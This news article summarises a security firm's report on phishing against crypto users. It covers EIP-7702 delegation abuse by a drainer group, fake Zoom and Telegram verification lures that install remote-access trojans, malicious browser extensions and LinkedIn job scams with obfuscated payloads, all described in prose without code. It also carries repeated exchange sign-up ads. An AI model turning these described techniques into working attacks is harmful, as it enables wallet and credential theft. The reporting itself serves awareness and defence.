MetaMask, Zoom, Telegram: new phishing threats hit Web3 via EIP-7702 abuse, fake browser plugins, LinkedIn scams, deepfakes, and bots. Perfect systems are impossible, and technical vulnerabilities are inevitable. So, the primary vulnerability remains the human element, and the stronger software engineering becomes, the more frequently attackers turn to social engineering. Let’s take a look at the most illustrative cases in recent months.
Want even more actionable insights on key events in the crypto industry? Join Trading Legends to access in-depth market analysis, daily trading setups, live sessions with professional traders, a strong community where crypto enthusiasts share trading strategies, experience, and success – and much more!
Next-Generation Phishing: From Approvals to Delegation
The SlowMist report has proven to be extremely valuable in revealing the current state of security. In addition to the core figures, which are quite impressive, the report also highlighted several trends related to current threats. Notably, the most technically significant case involved the use of EIP-7702, and the loss amounted to $146,551. The group Inferno Drainer attacked a user on May 24, 2025, by setting up a delegation to the address 0x63c0c19a282a1B52b07dD5a65b58948A07DAE32B, which was already present in MetaMask’s infrastructure as an EIP-7702 Delegator.
The delegation mechanism made it possible to use approve functions on behalf of the user without changing the EOA. The key problem was that the user granted permission not to a “malicious contract” but to a legitimate Delegator, which was used for phishing logic. Most anti-phishing tools are focused on blocking transfer but not approve, which allows bypassing the protection.
SlowMist makes a rather fair observation regarding the risks of multi-chain delegation (chainId = 0), the potential for storage incompatibility during redelegation, and the need for permission validation via ecrecover in wallets compatible with EIP-4337.
Deepfake and Social Engineering: Trust as a Weapon
Among the most illustrative social engineering cases was the attack on Mehdi Farooq from Hypersphere Ventures. The attacker, posing as “Alex Lin,” invited the victim to a Zoom meeting under the pretext of compliance. The victim downloaded a fake “updated” Zoom client, which activated a trojan and gave the attacker remote control over the device. As a result, all six crypto wallets were emptied within minutes. During the attack, the perpetrator continued chatting via Telegram, lowering the victim’s level of concern.
Also common are campaigns using deepfake videos of public figures – Lee Hsien Loong, Lawrence Wong, Elon Musk – to promote scam platforms via X and Telegram. The videos are distributed with comments disabled and links to investment platforms visually styled to appear official or affiliated with government structures. The report also notes the use of deepfake videos to bypass KYC on centralized exchanges: the videos are generated based on real user photos.
Did you know new WEEX users can claim $100 just for signing up — plus get a VIP upgrade with lower fees? Sign Uphere.
Telegram SafeGuard Scam: RAT via Clipboard
Another widely spread attack involves fake Safeguard bots on Telegram. The user would join a channel via a link from an”investor” or KOL, where they were prompted to verify via “Tap to verify.” After a fake verification failure, the bot suggested proceeding with manual verification. The user was instructed to open the “Run” dialog and paste the contents of the clipboard.
In reality, the clipboard already contained a PowerShell command that initiated the download of malware. Remcos RAT was installed, providing remote access to:
- seed phrases,
- Keychain and Chrome Local Storage,
- system passwords, and saved 2FA tokens.
The attack worked on both Windows and macOS using different versions of loaders, so the key recommendation here is to perform a full OS reinstall, reset all passwords, and replace all hot wallets.
Loader-Replacing Extensions: Osiris and SwitchyOmega
We’ve already covered the large-scale case of fake extensions for nearly every crypto wallet on Firefox, but there are still a couple more worth mentioning:
- Osiris – distributed as a Web3 security tool. It replaced .exe, .dmg, and .zip downloads from official websites (Zoom, Notion) with malicious files. The download interface still appeared “official,” while the replacement occurred via network interception rules loaded from a C2 server.
- SwitchyOmega – a popular proxy manager for Chrome. The developer received a fake email allegedly from Google and granted access to an OAuth application. The malicious version 24.10.4 was uploaded and automatically updated for over 2.6 million users within 31 hours. The malicious worker.js connected to a C2 server, loaded configuration data, and listened for events from content.js.
LinkedIn Phishing Against Developers
Attackers have also managed to turn LinkedIn into a weapon. They actively launched attacks disguised as recruitment for frontend developers in Web3 projects. The victim would receive detailed documentation, a Figma link, and a Bitbucket repository link containing the technical assignment.
The server.js file contained a horizontally scrollable line – a sign of an obfuscated payload. When run, the script connected to a C2 server, downloaded and executed two files: .npl (persistence) and test.js (data exfiltration). As a result, this type of attack targets:
- SSH keys,
- Keychain (macOS),
- Web3 extensions (seed, authorizations),
- establishing a persistent connection via heartbeat requests.
Did you know new WEEX users can claim $100 just for signing up — plus get a VIP upgrade with lower fees? Sign Uphere.
How to Protect Against These Attacks
These types of attacks are evolving and becoming more sophisticated, while detecting them may remain impossible for quite some time. The unfortunate truth is that at least one victim must emerge before their experience becomes known, and others can avoid the same fate.
Nonetheless, it’s important to follow established security practices – starting with safe code and continuous audits for developers, as well as digital hygiene and a healthy degree of skepticism for users. It may seem obvious, but in reality, not everyone follows these practices due to production constraints or inattentive user behavior. Not neglecting them already creates a substantial barrier for attackers.
Also, always stay alert and stay tuned to keep up with the latest developments in crypto, blockchain, and DeFi!
